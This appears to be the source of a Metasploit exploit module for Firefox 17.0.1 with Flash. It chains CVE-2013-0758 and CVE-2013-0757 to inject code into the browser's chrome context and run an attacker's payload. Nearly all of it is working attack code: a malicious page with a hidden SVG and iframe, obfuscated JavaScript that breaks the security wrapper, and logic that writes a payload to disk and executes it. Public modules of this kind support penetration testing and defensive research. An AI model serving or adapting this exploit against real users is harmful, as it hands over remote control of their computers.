Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::BrowserExploitServer
10
  include Msf::Exploit::EXE
11
  # include Msf::Exploit::Remote::BrowserAutopwn
12
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
13

14
  # autopwn_info({
15
  #   :ua_name    => HttpClients::FF,
16
  #   :ua_minver  => "17.0",
17
  #   :ua_maxver  => "17.0.1",
18
  #   :javascript => true,
19
  #   :rank       => NormalRanking
20
  # })
21

22
  def initialize(info = {})
23
    super(update_info(info,
24
      'Name'           => 'Firefox 17.0.1 Flash Privileged Code Injection',
25
      'Description'    => %q{
26
        This exploit gains remote code execution on Firefox 17 and 17.0.1, provided
27
        the user has installed Flash. No memory corruption is used.
28

29
        First, a Flash object is cloned into the anonymous content of the SVG
30
        "use" element in the <body> (CVE-2013-0758). From there, the Flash object
31
        can navigate a child frame to a URL in the chrome:// scheme.
32

33
        Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper
34
        around the child frame's window reference and inject code into the chrome://
35
        context. Once we have injection into the chrome execution context, we can write
36
        the payload to disk, chmod it (if posix), and then execute.
37

38
        Note: Flash is used here to trigger the exploit but any Firefox plugin
39
        with script access should be able to trigger it.
40
      },
41
      'License'        => MSF_LICENSE,
42
      'Targets' => [
43
        [
44
          'Universal (Javascript XPCOM Shell)', {
45
            'Platform' => 'firefox',
46
            'Arch' => ARCH_FIREFOX
47
          }
48
        ],
49
        [
50
          'Native Payload', {
51
            'Platform' => %w{ java linux osx solaris win },
52
            'Arch'     => ARCH_ALL
53
          }
54
        ]
55
      ],
56
      'DefaultTarget' => 0,
57
      'Author'         =>
58
        [
59
          'Marius Mlynski', # discovery & bug report
60
          'joev',           # metasploit module
61
          'sinn3r'          # metasploit fu
62
        ],
63
      'References'     =>
64
        [
65
          ['CVE', '2013-0758'],  # navigate a frame to a chrome:// URL
66
          ['CVE', '2013-0757'],  # bypass Chrome Object Wrapper to talk to chrome://
67
          ['OSVDB', '89019'],  # maps to CVE 2013-0757
68
          ['OSVDB', '89020'],  # maps to CVE 2013-0758
69
          ['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],
70
          ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']
71
        ],
72
      'DisclosureDate' => '2013-01-08',
73
      'BrowserRequirements' => {
74
        :source  => 'script',
75
        :ua_name => HttpClients::FF,
76
        :ua_ver  => /17\..*/,
77
        :flash   => /[\d.]+/
78
      }
79
    ))
80

81
    register_options(
82
      [
83
        OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] ),
84
        OptBool.new('DEBUG_JS', [false, "Display some alert()'s for debugging the payload.", false])
85
      ], Auxiliary::Timed)
86

87
  end
88

89
  def on_request_exploit(cli, request, info)
90
    if request.uri =~ /\.swf$/
91
      # send Flash .swf for navigating the frame to chrome://
92
      print_status("Sending .swf trigger.")
93
      send_response(cli, flash_trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
94
    else
95
      # send initial HTML page
96
      print_status("Target selected: #{target.name}")
97
      print_status("Sending #{self.name}")
98
      send_response_html(cli, generate_html(cli, target))
99
    end
100
  end
101

102
  # @return [String] the contents of the .swf file used to trigger the exploit
103
  def flash_trigger
104
    swf_path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-0758.swf")
105
    @flash_trigger ||= File.read(swf_path)
106
  end
107

108
  # @return [String] containing javascript that will alert a debug string
109
  #   if the DEBUG is set to true
110
  def js_debug(str, quote="'")
111
    if datastore['DEBUG_JS'] then "alert(#{quote}#{str}#{quote})" else '' end
112
  end
113

114
  # @return [String] HTML that is sent in the first response to the client
115
  def generate_html(cli, target)
116
    vars = {
117
      :symbol_id        => 'a',
118
      :random_domain    => 'safe',
119
      :payload          => run_payload, # defined in FirefoxPrivilegeEscalation mixin
120
      :payload_var      => 'c',
121
      :payload_key      => 'k',
122
      :payload_obj_var  => 'payload_obj',
123
      :interval_var     => 'itvl',
124
      :access_string    => 'access',
125
      :frame_ref        => 'frames[0]',
126
      :frame_name       => 'n',
127
      :loader_path      => "#{get_module_uri}.swf",
128
      :content          => self.datastore['CONTENT'] || ''
129
    }
130
    script = js_obfuscate %Q|
131
      var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
132
      var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
133
      function $() {
134
        document.querySelector('base').href = "http://www.#{vars[:random_domain]}.com/";
135
      }
136
      function _() {
137
        return '#{vars[:frame_name]}';
138
      }
139
      var #{vars[:interval_var]} = setInterval(function(){
140
        try{ #{vars[:frame_ref]}['#{vars[:access_string]}'] }
141
        catch(e){
142
          clearInterval(#{vars[:interval_var]});
143
          var p = Object.getPrototypeOf(#{vars[:frame_ref]});
144
          var o = {__exposedProps__: {setTimeout: "rw", call: "rw"}};
145
          Object.prototype.__lookupSetter__("__proto__").call(p, o);
146
          p.setTimeout.call(#{vars[:frame_ref]}, #{vars[:payload_var]}, 1);
147
        }
148
      }, 100);
149
      document.querySelector('object').data = "#{vars[:loader_path]}";
150
      document.querySelector('use').setAttributeNS(
151
        "http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
152
      );
153
    |
154

155
    %Q|
156
      <!doctype html>
157
      <html>
158
      <head>
159
        <base href="chrome://browser/content/">
160
      </head>
161
      <body>
162

163
      <svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
164
        <symbol id="#{vars[:symbol_id]}">
165
          <foreignObject>
166
            <object></object>
167
          </foreignObject>
168
        </symbol>
169
        <use />
170
      </svg>
171

172
      <script>
173
      #{script}
174
      </script>
175

176
      <iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
177
        name="#{vars[:frame_name]}"></iframe>
178
      #{vars[:content]}
179
      </body>
180
      </html>
181
      |
182
  end
183
end
184

185